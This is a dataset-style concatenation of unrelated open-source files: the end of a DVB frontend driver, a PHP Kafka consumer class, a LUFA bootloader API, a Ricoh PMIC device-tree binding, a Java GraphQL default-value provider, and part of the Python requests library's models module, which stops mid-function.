FE_CAN_TRANSMISSION_MODE_AUTO | FE_CAN_GUARD_INTERVAL_AUTO |
FE_CAN_HIERARCHY_AUTO,
},
.release = ttusbdecfe_release,
.set_frontend = ttusbdecfe_dvbt_set_frontend,
.get_tune_settings = ttusbdecfe_dvbt_get_tune_settings,
.read_status = ttusbdecfe_dvbt_read_status,
};
static struct dvb_frontend_ops ttusbdecfe_dvbs_ops = {
.delsys = { SYS_DVBS },
.info = {
.name = "TechnoTrend/Hauppauge DEC3000-s Frontend",
.frequency_min = 950000,
.frequency_max = 2150000,
.frequency_stepsize = 125,
.symbol_rate_min = 1000000, /* guessed */
.symbol_rate_max = 45000000, /* guessed */
.caps = FE_CAN_FEC_1_2 | FE_CAN_FEC_2_3 | FE_CAN_FEC_3_4 |
FE_CAN_FEC_5_6 | FE_CAN_FEC_7_8 | FE_CAN_FEC_AUTO |
FE_CAN_QPSK
},
.release = ttusbdecfe_release,
.set_frontend = ttusbdecfe_dvbs_set_frontend,
.read_status = ttusbdecfe_dvbs_read_status,
.diseqc_send_master_cmd = ttusbdecfe_dvbs_diseqc_send_master_cmd,
.set_voltage = ttusbdecfe_dvbs_set_voltage,
.set_tone = ttusbdecfe_dvbs_set_tone,
};
MODULE_DESCRIPTION("TTUSB DEC DVB-T/S Demodulator driver");
MODULE_AUTHOR("Alex Woods/Andrew de Quincey");
MODULE_LICENSE("GPL");
EXPORT_SYMBOL(ttusbdecfe_dvbt_attach);
EXPORT_SYMBOL(ttusbdecfe_dvbs_attach);
| {
"pile_set_name": "Github"
} |
<?php
declare(strict_types=1);
namespace Kafka\Consumer;
use Kafka\Broker;
use Kafka\ConsumerConfig;
use Kafka\Exception;
use Kafka\LoggerTrait;
use Kafka\Protocol;
use Kafka\Protocol\Protocol as ProtocolTool;
use Psr\Log\LoggerAwareTrait;
use function count;
use function end;
use function explode;
use function in_array;
use function json_encode;
use function shuffle;
use function sprintf;
use function substr;
use function trim;
class Process
{
use LoggerAwareTrait;
use LoggerTrait;
/**
* @var callable|null
*/
protected $consumer;
/**
* @var string[][][]
*/
protected $messages = [];
/**
* @var State
*/
private $state;
public function __construct(?callable $consumer = null)
{
$this->consumer = $consumer;
}
public function init(): void
{
$config = $this->getConfig();
Protocol::init($config->getBrokerVersion(), $this->logger);
$broker = $this->getBroker();
$broker->setConfig($config);
$broker->setProcess(function (string $data, int $fd): void {
$this->processRequest($data, $fd);
});
$this->state = State::getInstance();
if ($this->logger) {
$this->state->setLogger($this->logger);
}
$this->state->setCallback(
[
State::REQUEST_METADATA => function (): void {
$this->syncMeta();
},
State::REQUEST_GETGROUP => function (): void {
$this->getGroupBrokerId();
},
State::REQUEST_JOINGROUP => function (): void {
$this->joinGroup();
},
State::REQUEST_SYNCGROUP => function (): void {
$this->syncGroup();
},
State::REQUEST_HEARTGROUP => function (): void {
$this->heartbeat();
},
State::REQUEST_OFFSET => function (): array {
return $this->offset();
},
State::REQUEST_FETCH_OFFSET => function (): void {
$this->fetchOffset();
},
State::REQUEST_FETCH => function (): array {
return $this->fetch();
},
State::REQUEST_COMMIT_OFFSET => function (): void {
$this->commit();
},
]
);
$this->state->init();
}
public function start(): void
{
$this->init();
$this->state->start();
}
public function stop(): void
{
// TODO: we should remove the consumer from the group here
$this->state->stop();
}
/**
* @throws Exception
*/
protected function processRequest(string $data, int $fd): void
{
$correlationId = ProtocolTool::unpack(ProtocolTool::BIT_B32, substr($data, 0, 4));
switch ($correlationId) {
case Protocol::METADATA_REQUEST:
$result = Protocol::decode(Protocol::METADATA_REQUEST, substr($data, 4));
if (! isset($result['brokers'], $result['topics'])) {
$this->error('Get metadata is fail, brokers or topics is null.');
$this->state->failRun(State::REQUEST_METADATA);
break;
}
/** @var Broker $broker */
$broker = $this->getBroker();
$isChange = $broker->setData($result['topics'], $result['brokers']);
$this->state->succRun(State::REQUEST_METADATA, $isChange);
break;
case Protocol::GROUP_COORDINATOR_REQUEST:
$result = Protocol::decode(Protocol::GROUP_COORDINATOR_REQUEST, substr($data, 4));
if (! isset($result['errorCode'], $result['coordinatorId']) || $result['errorCode'] !== Protocol::NO_ERROR) {
$this->state->failRun(State::REQUEST_GETGROUP);
break;
}
/** @var Broker $broker */
$broker = $this->getBroker();
$broker->setGroupBrokerId($result['coordinatorId']);
$this->state->succRun(State::REQUEST_GETGROUP);
break;
case Protocol::JOIN_GROUP_REQUEST:
$result = Protocol::decode(Protocol::JOIN_GROUP_REQUEST, substr($data, 4));
if (isset($result['errorCode']) && $result['errorCode'] === Protocol::NO_ERROR) {
$this->succJoinGroup($result);
break;
}
$this->failJoinGroup($result['errorCode']);
break;
case Protocol::SYNC_GROUP_REQUEST:
$result = Protocol::decode(Protocol::SYNC_GROUP_REQUEST, substr($data, 4));
if (isset($result['errorCode']) && $result['errorCode'] === Protocol::NO_ERROR) {
$this->succSyncGroup($result);
break;
}
$this->failSyncGroup($result['errorCode']);
break;
case Protocol::HEART_BEAT_REQUEST:
$result = Protocol::decode(Protocol::HEART_BEAT_REQUEST, substr($data, 4));
if (isset($result['errorCode']) && $result['errorCode'] === Protocol::NO_ERROR) {
$this->state->succRun(State::REQUEST_HEARTGROUP);
break;
}
$this->failHeartbeat($result['errorCode']);
break;
case Protocol::OFFSET_REQUEST:
$result = Protocol::decode(Protocol::OFFSET_REQUEST, substr($data, 4));
$this->succOffset($result, $fd);
break;
case ProtocolTool::OFFSET_FETCH_REQUEST:
$result = Protocol::decode(Protocol::OFFSET_FETCH_REQUEST, substr($data, 4));
$this->succFetchOffset($result);
break;
case ProtocolTool::FETCH_REQUEST:
$result = Protocol::decode(Protocol::FETCH_REQUEST, substr($data, 4));
$this->succFetch($result, $fd);
break;
case ProtocolTool::OFFSET_COMMIT_REQUEST:
$result = Protocol::decode(Protocol::OFFSET_COMMIT_REQUEST, substr($data, 4));
$this->succCommit($result);
break;
default:
$this->error('Error request, correlationId:' . $correlationId);
}
}
protected function syncMeta(): void
{
$this->debug('Start sync metadata request');
$config = $this->getConfig();
$brokerList = $config->getMetadataBrokerList();
$brokerHost = [];
foreach (explode(',', $brokerList) as $key => $val) {
if (trim($val)) {
$brokerHost[] = $val;
}
}
if (count($brokerHost) === 0) {
throw new Exception('No valid broker configured');
}
shuffle($brokerHost);
$broker = $this->getBroker();
foreach ($brokerHost as $host) {
$socket = $broker->getMetaConnect($host);
if ($socket === null) {
continue;
}
$params = $config->getTopics();
$this->debug('Start sync metadata request params:' . json_encode($params));
$requestData = Protocol::encode(Protocol::METADATA_REQUEST, $params);
$socket->write($requestData);
return;
}
throw Exception\ConnectionException::fromBrokerList($brokerList);
}
protected function getGroupBrokerId(): void
{
$broker = $this->getBroker();
$connect = $broker->getRandConnect();
if ($connect === null) {
return;
}
$config = $this->getConfig();
$params = ['group_id' => $config->getGroupId()];
$requestData = Protocol::encode(Protocol::GROUP_COORDINATOR_REQUEST, $params);
$connect->write($requestData);
}
protected function joinGroup(): void
{
$broker = $this->getBroker();
$groupBrokerId = $broker->getGroupBrokerId();
$connect = $broker->getMetaConnect((string) $groupBrokerId);
if ($connect === null) {
return;
}
$topics = $this->getConfig()->getTopics();
$assign = $this->getAssignment();
$memberId = $assign->getMemberId();
$params = [
'group_id' => $this->getConfig()->getGroupId(),
'session_timeout' => $this->getConfig()->getSessionTimeout(),
'rebalance_timeout' => $this->getConfig()->getRebalanceTimeout(),
'member_id' => $memberId ?? '',
'data' => [
[
'protocol_name' => 'range',
'version' => 0,
'subscription' => $topics,
'user_data' => '',
],
],
];
$requestData = Protocol::encode(Protocol::JOIN_GROUP_REQUEST, $params);
$connect->write($requestData);
$this->debug('Join group start, params:' . json_encode($params));
}
public function failJoinGroup(int $errorCode): void
{
$assign = $this->getAssignment();
$memberId = $assign->getMemberId();
$this->error(sprintf('Join group fail, need rejoin, errorCode %d, memberId: %s', $errorCode, $memberId));
$this->stateConvert($errorCode);
}
/**
* @param mixed[] $result
*/
public function succJoinGroup(array $result): void
{
$this->state->succRun(State::REQUEST_JOINGROUP);
$assign = $this->getAssignment();
$assign->setMemberId($result['memberId']);
$assign->setGenerationId($result['generationId']);
if ($result['leaderId'] === $result['memberId']) { // leader assign partition
$assign->assign($result['members']);
}
$this->debug(sprintf('Join group sucess, params: %s', json_encode($result)));
}
public function syncGroup(): void
{
$broker = $this->getBroker();
$groupBrokerId = $broker->getGroupBrokerId();
$connect = $broker->getMetaConnect((string) $groupBrokerId);
if ($connect === null) {
return;
}
$assign = $this->getAssignment();
$memberId = $assign->getMemberId();
$generationId = $assign->getGenerationId();
$params = [
'group_id' => $this->getConfig()->getGroupId(),
'generation_id' => $generationId ?? null,
'member_id' => $memberId,
'data' => $assign->getAssignments(),
];
$requestData = Protocol::encode(Protocol::SYNC_GROUP_REQUEST, $params);
$this->debug('Sync group start, params:' . json_encode($params));
$connect->write($requestData);
}
public function failSyncGroup(int $errorCode): void
{
$this->error(sprintf('Sync group fail, need rejoin, errorCode %d', $errorCode));
$this->stateConvert($errorCode);
}
/**
* @param mixed[][] $result
*/
public function succSyncGroup(array $result): void
{
$this->debug(sprintf('Sync group sucess, params: %s', json_encode($result)));
$this->state->succRun(State::REQUEST_SYNCGROUP);
$topics = $this->getBroker()->getTopics();
$brokerToTopics = [];
foreach ($result['partitionAssignments'] as $topic) {
foreach ($topic['partitions'] as $partId) {
$brokerId = $topics[$topic['topicName']][$partId];
$brokerToTopics[$brokerId] = $brokerToTopics[$brokerId] ?? [];
$topicInfo = $brokerToTopics[$brokerId][$topic['topicName']] ?? [];
$topicInfo['topic_name'] = $topic['topicName'];
$topicInfo['partitions'] = $topicInfo['partitions'] ?? [];
$topicInfo['partitions'][] = $partId;
$brokerToTopics[$brokerId][$topic['topicName']] = $topicInfo;
}
}
$assign = $this->getAssignment();
$assign->setTopics($brokerToTopics);
}
protected function heartbeat(): void
{
$broker = $this->getBroker();
$groupBrokerId = $broker->getGroupBrokerId();
$connect = $broker->getMetaConnect((string) $groupBrokerId);
if ($connect === null) {
return;
}
$assign = $this->getAssignment();
$memberId = $assign->getMemberId();
if (trim($memberId) === '') {
return;
}
$generationId = $assign->getGenerationId();
$params = [
'group_id' => $this->getConfig()->getGroupId(),
'generation_id' => $generationId,
'member_id' => $memberId,
];
$requestData = Protocol::encode(Protocol::HEART_BEAT_REQUEST, $params);
$connect->write($requestData);
}
public function failHeartbeat(int $errorCode): void
{
$this->error('Heartbeat error, errorCode:' . $errorCode);
$this->stateConvert($errorCode);
}
/**
* @return int[]
*/
protected function offset(): array
{
$context = [];
$broker = $this->getBroker();
$topics = $this->getAssignment()->getTopics();
foreach ($topics as $brokerId => $topicList) {
$connect = $broker->getMetaConnect((string) $brokerId);
if ($connect === null) {
return [];
}
$data = [];
foreach ($topicList as $topic) {
$item = [
'topic_name' => $topic['topic_name'],
'partitions' => [],
];
foreach ($topic['partitions'] as $partId) {
$item['partitions'][] = [
'partition_id' => $partId,
'offset' => 1,
'time' => -1,
];
$data[] = $item;
}
}
$params = [
'replica_id' => -1,
'data' => $data,
];
$stream = $connect->getSocket();
$requestData = Protocol::encode(Protocol::OFFSET_REQUEST, $params);
$connect->write($requestData);
$context[] = (int) $stream;
}
return $context;
}
/**
* @param mixed[][] $result
*/
public function succOffset(array $result, int $fd): void
{
$offsets = $this->getAssignment()->getOffsets();
$lastOffsets = $this->getAssignment()->getLastOffsets();
foreach ($result as $topic) {
foreach ($topic['partitions'] as $part) {
if ($part['errorCode'] !== Protocol::NO_ERROR) {
$this->stateConvert($part['errorCode']);
break 2;
}
$offsets[$topic['topicName']][$part['partition']] = end($part['offsets']);
$lastOffsets[$topic['topicName']][$part['partition']] = $part['offsets'][0];
}
}
$this->getAssignment()->setOffsets($offsets);
$this->getAssignment()->setLastOffsets($lastOffsets);
$this->state->succRun(State::REQUEST_OFFSET, $fd);
}
protected function fetchOffset(): void
{
$broker = $this->getBroker();
$groupBrokerId = $broker->getGroupBrokerId();
$connect = $broker->getMetaConnect((string) $groupBrokerId);
if ($connect === null) {
return;
}
$topics = $this->getAssignment()->getTopics();
$data = [];
foreach ($topics as $brokerId => $topicList) {
foreach ($topicList as $topic) {
$partitions = [];
if (isset($data[$topic['topic_name']]['partitions'])) {
$partitions = $data[$topic['topic_name']]['partitions'];
}
foreach ($topic['partitions'] as $partId) {
$partitions[] = $partId;
}
$data[$topic['topic_name']]['partitions'] = $partitions;
$data[$topic['topic_name']]['topic_name'] = $topic['topic_name'];
}
}
$params = [
'group_id' => $this->getConfig()->getGroupId(),
'data' => $data,
];
$requestData = Protocol::encode(Protocol::OFFSET_FETCH_REQUEST, $params);
$connect->write($requestData);
}
/**
* @param mixed[] $result
*/
public function succFetchOffset(array $result): void
{
$msg = sprintf('Get current fetch offset sucess, result: %s', json_encode($result));
$this->debug($msg);
$assign = $this->getAssignment();
$offsets = $assign->getFetchOffsets();
foreach ($result as $topic) {
foreach ($topic['partitions'] as $part) {
if ($part['errorCode'] !== 0) {
$this->stateConvert($part['errorCode']);
break 2;
}
$offsets[$topic['topicName']][$part['partition']] = $part['offset'];
}
}
$assign->setFetchOffsets($offsets);
$consumerOffsets = $assign->getConsumerOffsets();
$lastOffsets = $assign->getLastOffsets();
if (empty($consumerOffsets)) {
$consumerOffsets = $assign->getFetchOffsets();
foreach ($consumerOffsets as $topic => $value) {
foreach ($value as $partId => $offset) {
if (isset($lastOffsets[$topic][$partId]) && $lastOffsets[$topic][$partId] > $offset) {
$consumerOffsets[$topic][$partId] = $offset + 1;
}
}
}
$assign->setConsumerOffsets($consumerOffsets);
$assign->setCommitOffsets($assign->getFetchOffsets());
}
$this->state->succRun(State::REQUEST_FETCH_OFFSET);
}
/**
* @return int[]
*/
protected function fetch(): array
{
$this->messages = [];
$context = [];
$broker = $this->getBroker();
$topics = $this->getAssignment()->getTopics();
$consumerOffsets = $this->getAssignment()->getConsumerOffsets();
foreach ($topics as $brokerId => $topicList) {
$connect = $broker->getDataConnect((string) $brokerId);
if ($connect === null) {
return [];
}
$data = [];
foreach ($topicList as $topic) {
$item = [
'topic_name' => $topic['topic_name'],
'partitions' => [],
];
foreach ($topic['partitions'] as $partId) {
$item['partitions'][] = [
'partition_id' => $partId,
'offset' => isset($consumerOffsets[$topic['topic_name']][$partId]) ? $consumerOffsets[$topic['topic_name']][$partId] : 0,
'max_bytes' => $this->getConfig()->getMaxBytes(),
];
}
$data[] = $item;
}
$params = [
'max_wait_time' => $this->getConfig()->getMaxWaitTime(),
'replica_id' => -1,
'min_bytes' => '1000',
'data' => $data,
];
$this->debug('Fetch message start, params:' . json_encode($params));
$requestData = Protocol::encode(Protocol::FETCH_REQUEST, $params);
$connect->write($requestData);
$context[] = (int) $connect->getSocket();
}
return $context;
}
/**
* @param mixed[][][] $result
*/
public function succFetch(array $result, int $fd): void
{
$assign = $this->getAssignment();
$this->debug('Fetch success, result:' . json_encode($result));
foreach ($result['topics'] as $topic) {
foreach ($topic['partitions'] as $part) {
$context = [
$topic['topicName'],
$part['partition'],
];
if ($part['errorCode'] !== 0) {
$this->stateConvert($part['errorCode'], $context);
continue;
}
$offset = $assign->getConsumerOffset($topic['topicName'], $part['partition']);
if ($offset === null) {
return; // current is rejoin....
}
foreach ($part['messages'] as $message) {
$this->messages[$topic['topicName']][$part['partition']][] = $message;
$offset = $message['offset'];
}
$consumerOffset = ($part['highwaterMarkOffset'] > $offset) ? ($offset + 1) : $offset;
$assign->setConsumerOffset($topic['topicName'], $part['partition'], $consumerOffset);
$assign->setCommitOffset($topic['topicName'], $part['partition'], $offset);
}
}
$this->state->succRun(State::REQUEST_FETCH, $fd);
}
protected function consumeMessage(): void
{
foreach ($this->messages as $topic => $value) {
foreach ($value as $partition => $messages) {
foreach ($messages as $message) {
if ($this->consumer !== null) {
($this->consumer)($topic, $partition, $message);
}
}
}
}
$this->messages = [];
}
protected function commit(): void
{
$config = $this->getConfig();
if ($config->getConsumeMode() === ConsumerConfig::CONSUME_BEFORE_COMMIT_OFFSET) {
$this->consumeMessage();
}
$broker = $this->getBroker();
$groupBrokerId = $broker->getGroupBrokerId();
$connect = $broker->getMetaConnect((string) $groupBrokerId);
if ($connect === null) {
return;
}
$commitOffsets = $this->getAssignment()->getCommitOffsets();
$topics = $this->getAssignment()->getTopics();
$this->getAssignment()->setPreCommitOffsets($commitOffsets);
$data = [];
foreach ($topics as $brokerId => $topicList) {
foreach ($topicList as $topic) {
$partitions = [];
if (isset($data[$topic['topic_name']]['partitions'])) {
$partitions = $data[$topic['topic_name']]['partitions'];
}
foreach ($topic['partitions'] as $partId) {
if ($commitOffsets[$topic['topic_name']][$partId] === -1) {
continue;
}
$partitions[$partId]['partition'] = $partId;
$partitions[$partId]['offset'] = $commitOffsets[$topic['topic_name']][$partId];
}
$data[$topic['topic_name']]['partitions'] = $partitions;
$data[$topic['topic_name']]['topic_name'] = $topic['topic_name'];
}
}
$params = [
'group_id' => $this->getConfig()->getGroupId(),
'generation_id' => $this->getAssignment()->getGenerationId(),
'member_id' => $this->getAssignment()->getMemberId(),
'data' => $data,
];
$this->debug('Commit current fetch offset start, params:' . json_encode($params));
$requestData = Protocol::encode(Protocol::OFFSET_COMMIT_REQUEST, $params);
$connect->write($requestData);
}
/**
* @param mixed[][] $result
*/
public function succCommit(array $result): void
{
$this->debug('Commit success, result:' . json_encode($result));
$this->state->succRun(State::REQUEST_COMMIT_OFFSET);
foreach ($result as $topic) {
foreach ($topic['partitions'] as $part) {
if ($part['errorCode'] !== 0) {
$this->stateConvert($part['errorCode']);
return; // not call user consumer function
}
}
}
if ($this->getConfig()->getConsumeMode() === ConsumerConfig::CONSUME_AFTER_COMMIT_OFFSET) {
$this->consumeMessage();
}
}
/**
* @param string[] $context
*/
protected function stateConvert(int $errorCode, ?array $context = null): bool
{
$this->error(Protocol::getError($errorCode));
$recoverCodes = [
Protocol::UNKNOWN_TOPIC_OR_PARTITION,
Protocol::NOT_LEADER_FOR_PARTITION,
Protocol::BROKER_NOT_AVAILABLE,
Protocol::GROUP_LOAD_IN_PROGRESS,
Protocol::GROUP_COORDINATOR_NOT_AVAILABLE,
Protocol::NOT_COORDINATOR_FOR_GROUP,
Protocol::INVALID_TOPIC,
Protocol::INCONSISTENT_GROUP_PROTOCOL,
Protocol::INVALID_GROUP_ID,
];
$rejoinCodes = [
Protocol::ILLEGAL_GENERATION,
Protocol::INVALID_SESSION_TIMEOUT,
Protocol::REBALANCE_IN_PROGRESS,
Protocol::UNKNOWN_MEMBER_ID,
];
$assign = $this->getAssignment();
if (in_array($errorCode, $recoverCodes, true)) {
$this->state->recover();
$assign->clearOffset();
return false;
}
if (in_array($errorCode, $rejoinCodes, true)) {
if ($errorCode === Protocol::UNKNOWN_MEMBER_ID) {
$assign->setMemberId('');
}
$assign->clearOffset();
$this->state->rejoin();
return false;
}
if ($errorCode === Protocol::OFFSET_OUT_OF_RANGE) {
$resetOffset = $this->getConfig()->getOffsetReset();
$offsets = $resetOffset === 'latest' ? $assign->getLastOffsets() : $assign->getOffsets();
[$topic, $partId] = $context;
if (isset($offsets[$topic][$partId])) {
$assign->setConsumerOffset($topic, (int) $partId, $offsets[$topic][$partId]);
}
}
return true;
}
private function getBroker(): Broker
{
return Broker::getInstance();
}
private function getConfig(): ConsumerConfig
{
return ConsumerConfig::getInstance();
}
private function getAssignment(): Assignment
{
return Assignment::getInstance();
}
}
| {
"pile_set_name": "Github"
} |
/*
LUFA Library
Copyright (C) Dean Camera, 2015.
dean [at] fourwalledcubicle [dot] com
www.lufa-lib.org
*/
/*
Copyright 2015 Dean Camera (dean [at] fourwalledcubicle [dot] com)
Permission to use, copy, modify, distribute, and sell this
software and its documentation for any purpose is hereby granted
without fee, provided that the above copyright notice appear in
all copies and that both that the copyright notice and this
permission notice and warranty disclaimer appear in supporting
documentation, and that the name of the author not be used in
advertising or publicity pertaining to distribution of the
software without specific, written prior permission.
The author disclaims all warranties with regard to this
software, including all implied warranties of merchantability
and fitness. In no event shall the author be liable for any
special, indirect or consequential damages or any damages
whatsoever resulting from loss of use, data or profits, whether
in an action of contract, negligence or other tortious action,
arising out of or in connection with the use or performance of
this software.
*/
/** \file
*
* Bootloader user application API functions.
*/
#include "BootloaderAPI.h"
void BootloaderAPI_ErasePage(const uint32_t Address)
{
boot_page_erase_safe(Address);
boot_spm_busy_wait();
boot_rww_enable();
}
void BootloaderAPI_WritePage(const uint32_t Address)
{
boot_page_write_safe(Address);
boot_spm_busy_wait();
boot_rww_enable();
}
void BootloaderAPI_FillWord(const uint32_t Address, const uint16_t Word)
{
boot_page_fill_safe(Address, Word);
}
uint8_t BootloaderAPI_ReadSignature(const uint16_t Address)
{
return boot_signature_byte_get(Address);
}
uint8_t BootloaderAPI_ReadFuse(const uint16_t Address)
{
return boot_lock_fuse_bits_get(Address);
}
uint8_t BootloaderAPI_ReadLock(void)
{
return boot_lock_fuse_bits_get(GET_LOCK_BITS);
}
void BootloaderAPI_WriteLock(const uint8_t LockBits)
{
boot_lock_bits_set_safe(LockBits);
}
| {
"pile_set_name": "Github"
} |
Ricoh RN5T567 PMIC
This file describes the binding info for the PMIC driver.
Required properties:
- compatible: "ricoh,rn5t567"
- reg: depending on strapping, e.g. 0x33
With those two properties, the PMIC device can be used to read/write
registers.
Example:
rn5t567@33 {
compatible = "ricoh,rn5t567";
reg = <0x33>;
};
| {
"pile_set_name": "Github"
} |
package io.leangen.graphql.metadata.strategy.value;
import io.leangen.graphql.execution.GlobalEnvironment;
import io.leangen.graphql.metadata.strategy.type.DefaultTypeInfoGenerator;
import io.leangen.graphql.util.Defaults;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.lang.reflect.AnnotatedElement;
import java.lang.reflect.AnnotatedType;
import java.util.Collections;
/**
* @author Bojan Tomic (kaqqao)
*/
public class JsonDefaultValueProvider implements DefaultValueProvider {
private final ValueMapper valueMapper;
private static final Logger log = LoggerFactory.getLogger(JsonDefaultValueProvider.class);
public JsonDefaultValueProvider(GlobalEnvironment environment) {
this.valueMapper = Defaults.valueMapperFactory(new DefaultTypeInfoGenerator())
.getValueMapper(Collections.emptyMap(), environment);
}
@Override
public Object getDefaultValue(AnnotatedElement targetElement, AnnotatedType type, Object initialValue) {
return valueMapper.fromString((String) initialValue, type);
}
}
| {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
"""
requests.models
~~~~~~~~~~~~~~~
This module contains the primary objects that power Requests.
"""
import collections
import datetime
from io import BytesIO, UnsupportedOperation
from .hooks import default_hooks
from .structures import CaseInsensitiveDict
from .auth import HTTPBasicAuth
from .cookies import cookiejar_from_dict, get_cookie_header, _copy_cookie_jar
from .packages.urllib3.fields import RequestField
from .packages.urllib3.filepost import encode_multipart_formdata
from .packages.urllib3.util import parse_url
from .packages.urllib3.exceptions import (
DecodeError, ReadTimeoutError, ProtocolError, LocationParseError)
from .exceptions import (
HTTPError, MissingSchema, InvalidURL, ChunkedEncodingError,
ContentDecodingError, ConnectionError, StreamConsumedError)
from .utils import (
guess_filename, get_auth_from_url, requote_uri,
stream_decode_response_unicode, to_key_val_list, parse_header_links,
iter_slices, guess_json_utf, super_len, to_native_string)
from .compat import (
cookielib, urlunparse, urlsplit, urlencode, str, bytes, StringIO,
is_py2, chardet, builtin_str, basestring)
from .compat import json as complexjson
from .status_codes import codes
#: The set of HTTP status codes that indicate an automatically
#: processable redirect.
REDIRECT_STATI = (
codes.moved, # 301
codes.found, # 302
codes.other, # 303
codes.temporary_redirect, # 307
codes.permanent_redirect, # 308
)
DEFAULT_REDIRECT_LIMIT = 30
CONTENT_CHUNK_SIZE = 10 * 1024
ITER_CHUNK_SIZE = 512
class RequestEncodingMixin(object):
@property
def path_url(self):
"""Build the path URL to use."""
url = []
p = urlsplit(self.url)
path = p.path
if not path:
path = '/'
url.append(path)
query = p.query
if query:
url.append('?')
url.append(query)
return ''.join(url)
@staticmethod
def _encode_params(data):
"""Encode parameters in a piece of data.
Will successfully encode parameters when passed as a dict or a list of
2-tuples. Order is retained if data is a list of 2-tuples but arbitrary
if parameters are supplied as a dict.
"""
if isinstance(data, (str, bytes)):
return data
elif hasattr(data, 'read'):
return data
elif hasattr(data, '__iter__'):
result = []
for k, vs in to_key_val_list(data):
if isinstance(vs, basestring) or not hasattr(vs, '__iter__'):
vs = [vs]
for v in vs:
if v is not None:
result.append(
(k.encode('utf-8') if isinstance(k, str) else k,
v.encode('utf-8') if isinstance(v, str) else v))
return urlencode(result, doseq=True)
else:
return data
@staticmethod
def _encode_files(files, data):
"""Build the body for a multipart/form-data request.
Will successfully encode files when passed as a dict or a list of
2-tuples. Order is retained if data is a list of 2-tuples but arbitrary
if parameters are supplied as a dict.
"""
if (not files):
raise ValueError("Files must be provided.")
elif isinstance(data, basestring):
raise ValueError("Data must not be a string.")
new_fields = []
fields = to_key_val_list(data or {})
files = to_key_val_list(files or {})
for field, val in fields:
if isinstance(val, basestring) or not hasattr(val, '__iter__'):
val = [val]
for v in val:
if v is not None:
# Don't call str() on bytestrings: in Py3 it all goes wrong.
if not isinstance(v, bytes):
v = str(v)
new_fields.append(
(field.decode('utf-8') if isinstance(field, bytes) else field,
v.encode('utf-8') if isinstance(v, str) else v))
for (k, v) in files:
# support for explicit filename
ft = None
fh = None
if isinstance(v, (tuple, list)):
if len(v) == 2:
fn, fp = v
elif len(v) == 3:
fn, fp, ft = v
else:
fn, fp, ft, fh = v
else:
fn = guess_filename(v) or k
fp = v
if isinstance(fp, (str, bytes, bytearray)):
fdata = fp
else:
fdata = fp.read()
rf = RequestField(name=k, data=fdata, filename=fn, headers=fh)
rf.make_multipart(content_type=ft)
new_fields.append(rf)
body, content_type = encode_multipart_formdata(new_fields)
return body, content_type
class RequestHooksMixin(object):
def register_hook(self, event, hook):
"""Properly register a hook."""
if event not in self.hooks:
raise ValueError('Unsupported event specified, with event name "%s"' % (event))
if isinstance(hook, collections.Callable):
self.hooks[event].append(hook)
elif hasattr(hook, '__iter__'):
self.hooks[event].extend(h for h in hook if isinstance(h, collections.Callable))
def deregister_hook(self, event, hook):
"""Deregister a previously registered hook.
Returns True if the hook existed, False if not.
"""
try:
self.hooks[event].remove(hook)
return True
except ValueError:
return False
class Request(RequestHooksMixin):
"""A user-created :class:`Request <Request>` object.
Used to prepare a :class:`PreparedRequest <PreparedRequest>`, which is sent to the server.
:param method: HTTP method to use.
:param url: URL to send.
:param headers: dictionary of headers to send.
:param files: dictionary of {filename: fileobject} files to multipart upload.
:param data: the body to attach to the request. If a dictionary is provided, form-encoding will take place.
:param json: json for the body to attach to the request (if data is not specified).
:param params: dictionary of URL parameters to append to the URL.
:param auth: Auth handler or (user, pass) tuple.
:param cookies: dictionary or CookieJar of cookies to attach to this request.
:param hooks: dictionary of callback hooks, for internal usage.
Usage::
>>> import requests
>>> req = requests.Request('GET', 'http://httpbin.org/get')
>>> req.prepare()
<PreparedRequest [GET]>
"""
def __init__(self, method=None, url=None, headers=None, files=None,
data=None, params=None, auth=None, cookies=None, hooks=None, json=None):
# Default empty dicts for dict params.
data = [] if data is None else data
files = [] if files is None else files
headers = {} if headers is None else headers
params = {} if params is None else params
hooks = {} if hooks is None else hooks
self.hooks = default_hooks()
for (k, v) in list(hooks.items()):
self.register_hook(event=k, hook=v)
self.method = method
self.url = url
self.headers = headers
self.files = files
self.data = data
self.json = json
self.params = params
self.auth = auth
self.cookies = cookies
def __repr__(self):
return '<Request [%s]>' % (self.method)
def prepare(self):
"""Constructs a :class:`PreparedRequest <PreparedRequest>` for transmission and returns it."""
p = PreparedRequest()
p.prepare(
method=self.method,
url=self.url,
headers=self.headers,
files=self.files,
data=self.data,
json=self.json,
params=self.params,
auth=self.auth,
cookies=self.cookies,
hooks=self.hooks,
)
return p
class PreparedRequest(RequestEncodingMixin, RequestHooksMixin):
"""The fully mutable :class:`PreparedRequest <PreparedRequest>` object,
containing the exact bytes that will be sent to the server.
Generated from either a :class:`Request <Request>` object or manually.
Usage::
>>> import requests
>>> req = requests.Request('GET', 'http://httpbin.org/get')
>>> r = req.prepare()
<PreparedRequest [GET]>
>>> s = requests.Session()
>>> s.send(r)
<Response [200]>
"""
def __init__(self):
#: HTTP verb to send to the server.
self.method = None
#: HTTP URL to send the request to.
self.url = None
#: dictionary of HTTP headers.
self.headers = None
# The `CookieJar` used to create the Cookie header will be stored here
# after prepare_cookies is called
self._cookies = None
#: request body to send to the server.
self.body = None
#: dictionary of callback hooks, for internal usage.
self.hooks = default_hooks()
def prepare(self, method=None, url=None, headers=None, files=None,
data=None, params=None, auth=None, cookies=None, hooks=None, json=None):
"""Prepares the entire request with the given parameters."""
self.prepare_method(method)
self.prepare_url(url, params)
self.prepare_headers(headers)
self.prepare_cookies(cookies)
self.prepare_body(data, files, json)
self.prepare_auth(auth, url)
# Note that prepare_auth must be last to enable authentication schemes
# such as OAuth to work on a fully prepared request.
# This MUST go after prepare_auth. Authenticators could add a hook
self.prepare_hooks(hooks)
def __repr__(self):
return '<PreparedRequest [%s]>' % (self.method)
def copy(self):
p = PreparedRequest()
p.method = self.method
p.url = self.url
p.headers = self.headers.copy() if self.headers is not None else None
p._cookies = _copy_cookie_jar(self._cookies)
p.body = self.body
p.hooks = self.hooks
return p
def prepare_method(self, method):
"""Prepares the given HTTP method."""
self.method = method
if self.method is not None:
self.method = self.method.upper()
def prepare_url(self, url, params):
"""Prepares the given HTTP URL."""
#: Accept objects that have string representations.
#: We're unable to blindy call unicode/str functions
#: as this will include the bytestring indicator (b'')
#: on python 3.x.
#: https://github.com/kennethreitz/requests/pull/2238
if isinstance(url, bytes):
url = url.decode('utf8')
else:
url = unicode(url) if is_py2 else str(url)
# Don't do any URL preparation for non-HTTP schemes like `mailto`,
# `data` etc to work around exceptions from `url_parse`, which
